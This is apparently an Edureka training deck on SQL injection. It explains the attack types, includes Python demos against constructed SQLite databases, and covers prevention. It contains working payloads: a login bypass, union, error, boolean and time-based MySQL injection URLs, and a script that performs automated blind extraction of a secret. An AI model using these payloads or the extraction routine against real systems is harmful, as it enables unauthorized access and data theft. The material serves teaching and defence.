Cybersecurity Certification Training www.edureka.co/cybersecurity-certification-training
Agenda
01 What is Application Security?
02 What is SQL Injection Attack?
03 Types of SQL Injection Attacks
04 Demo - SQL Injection Attack types
05 Prevention of SQL Injection attack
Copyright © 2019, edureka and/or its affiliates. All rights reserved.
Application Security
Cybersecurity
Cyber security refers to the body of technologies, processes, and practices designed to protect networks, devices, programs, and data from attack, damage, or unauthorized access. Its main areas are:
Application Security
Network Security
Information Security
Operational Security
Disaster Recovery
End-user Education
Application Security
Application security is the use of software, hardware, and procedural methods to protect applications from external threats.

[Bar chart, "Web Application Vulnerabilities": percentage of web application vulnerabilities by class (the slide does not name the data source). Classes shown: Cross Site Scripting, SQL Injection, File Upload, Cross Site Request Forgery, Local File Inclusion, Remote Code Execution, Full Path Disclosure, Remote File Inclusion, Authentication Bypass, General Bypass, Open Redirect (labelled "Open Direct" on the slide), XML External Entity, Denial of Service. Bar values shown: 46.97%, 18.01%, 9.69%, 8.63%, 4.57%, 2.75%, 2.44%, 2.19%, 2.19%, 1.69%, 0.63%, 0.19%, 0.06%.]
What is SQL Injection?
In the early days of the internet, building websites was pretty straightforward. As the need for more advanced technology and dynamic websites grew, a typical web application came to span three tiers:
Front End: HTML, CSS, JavaScript
Back End: .NET, PHP, Ruby, Python
Database: MySQL, Oracle, MongoDB
A SQL query is one way an application interacts with its database.
A SQL injection occurs when an application builds a query from user input without sanitizing or, better, parameterizing it, so the input is parsed as part of the SQL statement instead of as data.
An attacker can then supply specially crafted SQL fragments that the web application's database server executes, giving the attacker control over what the query does.
SQL Injection Attack – Non Technical Explanation
Think of a bus driver who follows an instruction form with three blanks:

    Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.

Sample populated form:

    Drive through route77 and stop at the bus stop if there are people at the bus stop.

If whoever fills in the second blank writes an instruction instead of a place, the driver reads:

    Drive through route77 and do not stop at the bus stop and ignore the rest of the form. if there are people at the bus stop

The driver cannot tell where the blank ends and the original instruction resumes, so the inserted text is obeyed and the condition "if there are people at the bus stop" is ignored. A SQL injection works the same way: user input is pasted into a query template, and the database cannot tell data from instructions.
SQL Injection Attack – Technical Explanation
Sample SQL statement (PHP, with both inputs concatenated straight into the query string):

    $statement = "SELECT *
                  FROM users
                  WHERE username = '$user' AND password = '$password'";

With the expected input the query becomes:

    $statement = "SELECT *
                  FROM users
                  WHERE username = 'Dean' AND password = 'WinchesterS'";

Sample SQL Injection
If the attacker submits the username Dean' OR '1'='1' -- (with a space after the dashes, which MySQL requires for a -- comment), the application builds:

    $statement = "SELECT *
                  FROM users
                  WHERE username = 'Dean' OR '1'='1' -- ' AND password = 'WinchesterS'";

Two things happen here. '1'='1' is a condition that is always true, so the WHERE clause matches every row and the input is accepted as valid by the application. The -- instructs the SQL parser that the rest of the line is a comment and should not be executed, so the password check never runs. Any row returned is treated as a successful login.
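The login above, rebuilt as a runnable added example (not code from the slides) in Python against an in-memory SQLite database: one function concatenates the inputs into the query text exactly like the slide's PHP, the other binds them as parameters. The `users` table, its rows and the helper names are constructed for this demo; plaintext passwords are kept only because that is what the slide's query compares.

```python
import sqlite3

# Added example, not from the slides: the slide's login query with and
# without string concatenation. Table contents below are constructed data.


def make_db():
    """Create the constructed `users` table the slide's query refers to."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dean", "WinchesterS"), ("Sam", "Lawyer1"), ("admin", "hunter2")],
    )
    conn.commit()
    return conn


def build_vulnerable_statement(user, password):
    """Exactly the slide's pattern: user input pasted into the query text."""
    return (
        "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
        % (user, password)
    )


def login_vulnerable(conn, user, password):
    """Returns the matched rows; the application treats any row as a login."""
    return conn.execute(build_vulnerable_statement(user, password)).fetchall()


def login_parameterized(conn, user, password):
    """Same query with placeholders: the driver sends the values separately
    from the SQL text, so a quote or -- inside them is data, never syntax."""
    statement = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(statement, (user, password)).fetchall()


# The slide's payload: closes the username literal, adds an always-true
# condition and comments out the password check.
PAYLOAD = "Dean' OR '1'='1' -- "

if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_statement(PAYLOAD, "wrong"))
    print("vulnerable:", len(login_vulnerable(conn, PAYLOAD, "wrong")), "rows")
    print("parameterized:", len(login_parameterized(conn, PAYLOAD, "wrong")), "rows")
```

With the payload and a wrong password the concatenated query returns every row in the table, while the parameterized query returns nothing because the database looks for a user literally named `Dean' OR '1'='1' -- `.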
Impact of SQL Injection Attack
Extracting sensitive information
Misusing authentication details (logging in without valid credentials)
Deleting data and dropping tables
Types of SQL Injection
Categories of SQL Injection
SQL Injection
    In-Band SQLi: Error-based, Union-based
    Blind SQLi: Boolean-based, Time-based
    Out-of-band SQLi
Types of SQL Injection
The example URLs below target a MySQL back end behind a page that interpolates the id parameter unquoted into its query.

Union-based SQL Injection: the UNION operator appends the rows of an attacker-chosen SELECT to the result of the original query, so the data is shown in the page. The injected SELECT must return the same number of columns as the original query.
    https://example.com/index.php?id=1 UNION SELECT @@version-- -

Error-based SQL Injection: the database is made to put the wanted value (here version()) into an error message that the application echoes back. This MySQL payload forces a duplicate-key error inside a GROUP BY whose key contains the version string.
    https://example.com/index.php?id=1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -

Boolean-based (blind) SQL Injection: no data is returned directly; the attacker asks a true/false question and watches whether the page content changes.
    https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false)

Time-based (blind) SQL Injection: when the page looks the same either way, the answer is read from the response time instead; here the response is delayed about three seconds only if the condition holds.
    https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)

Out-of-band SQL Injection: the result travels over a separate channel, for example a DNS or HTTP request the database server is made to issue to a host the attacker controls, rather than in the HTTP response. It is used when neither page content nor timing can be observed in-band.
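Union-based and boolean-based blind extraction, as an added example that is not from the slides, run against a constructed SQLite database. The `products` and `settings` tables, their rows, and the vulnerable `id` endpoint are assumptions for this demo; SQLite's `sqlite_version()` stands in for MySQL's `@@version`, and time-based injection is not shown because SQLite has no `sleep()`.

```python
import sqlite3

# Added example, not from the slides. All table contents are constructed data.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE settings (name TEXT, value TEXT)")
    conn.executemany(
        "INSERT INTO products (name) VALUES (?)",
        [("Widget",), ("Gadget",), ("Gizmo",)],
    )
    conn.execute("INSERT INTO settings VALUES ('api_token', 's3cr3t-t0k3n')")
    conn.commit()
    return conn


def product_names(conn, id_param):
    """The vulnerable endpoint (index.php?id=...): the value is interpolated
    unquoted into the query, like the slide's URLs."""
    sql = "SELECT name FROM products WHERE id = %s" % id_param
    return [row[0] for row in conn.execute(sql).fetchall()]


def union_extract(conn, expression):
    """Union-based: id=-1 matches nothing, so the only row returned is the
    attacker's SELECT. Its column count (one) must match the original query."""
    return product_names(conn, "-1 UNION SELECT %s" % expression)


def page_shows_product(conn, id_param):
    """Blind variant: the page only reveals whether any product matched
    (a product page versus a 'not found' page)."""
    return len(product_names(conn, id_param)) > 0


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind: recover the string returned by `subquery` one
    character at a time. Each character is found by binary search over its
    code point, asking the oracle 'id=1 AND unicode(substr(...)) > mid'."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            question = "1 AND unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if oracle(question):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end gives '', unicode('') is NULL, so every
            # comparison is false and the search bottoms out: end of string.
            break
        result += chr(lo)
    return result


TOKEN_QUERY = "SELECT value FROM settings WHERE name = 'api_token'"

if __name__ == "__main__":
    conn = make_db()
    print("union, version:", union_extract(conn, "sqlite_version()"))
    print("union, token:  ", union_extract(conn, "value FROM settings"))
    print("blind, token:  ", blind_extract(lambda q: page_shows_product(conn, q), TOKEN_QUERY))
```

The blind path needs roughly seven requests per character (a binary search over 0..127), which is why real tools batch and automate it; the union path gets the same value in one request when the page echoes query results.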
Demo – Types of SQL Injection
Preventing SQL Injection
Performing static and dynamic testing: static analysis finds queries built by string concatenation in the code; dynamic testing (for example with a scanner such as sqlmap against a test instance) confirms whether a parameter is actually injectable.
Using parameterized queries and ORMs: prepared statements send the query text and the values separately, so input is never parsed as SQL. This is the primary defence. An ORM gives the same protection only as long as raw query strings are not assembled by hand.
Using escape characters in SQL queries: a fallback for legacy code. Escaping must use the database driver's own function and only protects values inside quoted string literals; it does nothing for numeric positions or for identifiers such as table and column names, which need type validation or an allow-list instead.
Enforcing least privilege on the database: the application's database account should have only the SELECT, INSERT and UPDATE rights it needs on its own tables, never DROP, file-system or administrative privileges, so that a successful injection cannot drop tables or read files.
Enabling web-application firewalls: a WAF blocks known payload patterns and is defence in depth, not a fix; encoded or unusual payloads can get past it, so the query code still has to be corrected.
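An added example, not from the slides, of where escaping stops working and what replaces it: the same unquoted numeric `id` lookup with quotes escaped (still injectable), the parameterized and type-validated version, and an allow-list for a sort column, which cannot be bound as a parameter. The `products` table, its rows and the function names are constructed for this demo.

```python
import sqlite3

# Added example, not from the slides. Table contents are constructed data.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)"
    )
    conn.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("Widget", 9.5), ("Gadget", 3.25), ("Gizmo", 12.0)],
    )
    conn.commit()
    return conn


def escape_quotes(value):
    """The 'escape characters' approach: double every single quote so the
    value cannot terminate a quoted SQL string literal."""
    return value.replace("'", "''")


def name_by_id_escaped(conn, id_param):
    """Escaping applied, but the value sits in an unquoted numeric position:
    there is no quote to break out of, so escaping changes nothing and
    '1 OR 1=1' is injected as-is."""
    sql = "SELECT name FROM products WHERE id = %s" % escape_quotes(id_param)
    return [r[0] for r in conn.execute(sql).fetchall()]


def name_by_id_safe(conn, id_param):
    """Validate the type, then bind: int() raises ValueError for anything
    that is not a number, and the placeholder keeps data out of the SQL text."""
    product_id = int(id_param)
    sql = "SELECT name FROM products WHERE id = ?"
    return [r[0] for r in conn.execute(sql, (product_id,)).fetchall()]


ALLOWED_SORT_COLUMNS = {"name", "price"}


def names_sorted(conn, sort_by):
    """Identifiers cannot be bound as parameters (a bound value in ORDER BY
    is a constant, not a column reference), so allow-list them instead."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unknown sort column: %r" % sort_by)
    sql = "SELECT name FROM products ORDER BY %s" % sort_by
    return [r[0] for r in conn.execute(sql).fetchall()]


if __name__ == "__main__":
    conn = make_db()
    print("escaped, injected:", name_by_id_escaped(conn, "1 OR 1=1"))
    print("safe:", name_by_id_safe(conn, "1"))
    print("sorted by price:", names_sorted(conn, "price"))
```

Least privilege is the layer behind all three: if the account running these queries has no DROP or file privileges, a payload that does get through is limited to what that account can already read or write.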
Exploiting SQL Vulnerability in Application

What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybersecurity Training | Edureka